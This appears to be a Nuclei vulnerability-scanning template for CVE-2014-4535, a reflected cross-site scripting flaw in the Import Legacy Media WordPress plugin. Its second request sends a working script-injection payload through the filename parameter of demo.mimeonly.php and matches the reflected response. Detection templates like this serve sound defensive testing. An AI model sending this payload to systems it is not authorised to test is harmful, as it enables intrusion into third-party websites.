id: CVE-2014-4535 info: name: Import Legacy Media <= 0.1 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. impact: | Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 epss-percentile: 0.48664 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: import_legacy_media_project product: import_legacy_media framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers: - type: word internal: true words: - '/wp-content/plugins/import-legacy-media/' - method: GET path: - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - "'>" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100c947aed3c99938dc952b322d6f2b1729438092660b31ff1c90783264a24cb01a0220265888536b4943a2204bc4141bffa43c67384e2b3be7f962cbf86d397dde8d17:922c64590222798bb761d5b6d8e72950